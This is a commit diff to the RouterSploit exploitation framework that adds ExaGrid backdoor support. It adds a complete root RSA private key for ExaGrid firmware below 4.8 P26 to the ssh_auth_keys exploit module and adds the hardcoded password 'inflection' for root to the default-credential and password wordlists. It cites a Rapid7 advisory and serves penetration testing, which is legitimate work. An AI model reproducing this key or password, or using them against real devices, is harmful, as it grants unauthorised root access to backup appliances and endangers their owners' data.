Exagrid backdoor SSH keys and hardcoded credentials (#214)

* Exagrid backdoor SSH keys and hardcoded credentials * Fixing style violations * ExaGrid exploit author

Exagrid backdoor SSH keys and hardcoded credentials (#214)
* Exagrid backdoor SSH keys and hardcoded credentials * Fixing style violations * ExaGrid exploit author
94c2c225 · Marcin Bury · Mariusz Kupidura · d38fa116 · 94c2c225 · 94c2c225
Commit 94c2c225 authored Mar 24, 2017 by Marcin Bury Committed by Mariusz Kupidura Mar 24, 2017
Showing with 25 additions and 2 deletions

ssh_auth_keys.py routersploit/modules/exploits/multi/ssh_auth_keys.py +23 -2

defaults.txt routersploit/wordlists/defaults.txt +1 -0

passwords.txt routersploit/wordlists/passwords.txt +1 -0

No files found.
--- a/routersploit/modules/exploits/multi/ssh_auth_keys.py
+++ b/routersploit/modules/exploits/multi/ssh_auth_keys.py
@@ -25,6 +25,7 @@ class Exploit(exploits.Exploit):
            'Jasper Greve',  # Ceragon FibeAir IP-10 vulnerability doscovery
            'HD Moore',  # Ceragon FibeAir IP-10 vulnerability discovery
            'Matta Consulting',  # F5 BigIP
+            'egypt',  # ExaGrid
            'Marcin Bury <marcin.bury[at]reverse-shell.com>',  # routersploit module
        ],
        'references': [
@@ -39,8 +40,10 @@ class Exploit(exploits.Exploit):
            'https://www.kb.cert.org/vuls/id/662676',
            'http://packetstormsecurity.com/files/125755/quantum-root.txt',
            'https://github.com/mitchellh/vagrant/tree/master/keys',
+            'https://community.rapid7.com/community/infosec/blog/2016/04/07/r7-2016-04-exagrid-backdoor-ssh-keys-and-hardcoded-credentials',
        ],
        'devices': [
+            'ExaGrid firmware < 4.8 P26',
            'Quantum DXi V1000',
            'Array Networks vxAG 9.2.0.34 and vAPV 8.3.2.17 appliances',
            'Barracuda Load Balancer',
@@ -55,6 +58,26 @@ class Exploit(exploits.Exploit):
    target = exploits.Option('', 'Target IP address e.g. 192.168.1.1', validators=validators.address)  # target address

    private_keys = [
+        {  # ExaGrid firmware < 4.8 P26
+            "user": "root",
+            "private_key": """
+            -----BEGIN RSA PRIVATE KEY-----
+            MIICWAIBAAKBgGdlD7qeGU9f8mdfmLmFemWMnz1tKeeuxKznWFI+6gkaagqjAF10
+            hIruzXQAik7TEBYZyvw9SvYU6MQFsMeqVHGhcXQ5yaz3G/eqX0RhRDn5T4zoHKZa
+            E1MU86zqAUdSXwHDe3pz5JEoGl9EUHTLMGP13T3eBJ19MAWjP7Iuji9HAgElAoGA
+            GSZrnBieX2pdjsQ55/AJA/HF3oJWTRysYWi0nmJUmm41eDV8oRxXl2qFAIqCgeBQ
+            BWA4SzGA77/ll3cBfKzkG1Q3OiVG/YJPOYLp7127zh337hhHZyzTiSjMPFVcanrg
+            AciYw3X0z2GP9ymWGOnIbOsucdhnbHPuSORASPOUOn0CQQC07Acq53rf3iQIkJ9Y
+            iYZd6xnZeZugaX51gQzKgN1QJ1y2sfTfLV6AwsPnieo7+vw2yk+Hl1i5uG9+XkTs
+            Ry45AkEAkk0MPL5YxqLKwH6wh2FHytr1jmENOkQu97k2TsuX0CzzDQApIY/eFkCj
+            QAgkI282MRsaTosxkYeG7ErsA5BJfwJAMOXYbHXp26PSYy4BjYzz4ggwf/dafmGz
+            ebQs+HXa8xGOreroPFFzfL8Eg8Ro0fDOi1lF7Ut/w330nrGxw1GCHQJAYtodBnLG
+            XLMvDHFG2AN1spPyBkGTUOH2OK2TZawoTmOPd3ymK28LriuskwxrceNb96qHZYCk
+            86DC8q8p2OTzYwJANXzRM0SGTqSDMnnid7PGlivaQqfpPOx8MiFR/cGr2dT1HD7y
+            x6f/85mMeTqamSxjTJqALHeKPYWyzeSnUrp+Eg==
+            -----END RSA PRIVATE KEY-----
+            """
+        },
        {  # quantum dxi v1000
            "user": "root",
            "private_key": """
@@ -212,8 +235,6 @@ class Exploit(exploits.Exploit):
            -----END RSA PRIVATE KEY-----
            """
        }
-
-
    ]

    valid = None

--- a/routersploit/wordlists/defaults.txt
+++ b/routersploit/wordlists/defaults.txt
@@ -356,6 +356,7 @@ root:cms500
 root:davox
 root:default
 root:fivranne
+root:inflection
 root:letacla
 root:pass
 root:permit

--- a/routersploit/wordlists/passwords.txt
+++ b/routersploit/wordlists/passwords.txt
@@ -315,6 +315,7 @@ images
 imss7.0
 inads
 indspw
+inflection
 infrant1
 initpw
 installer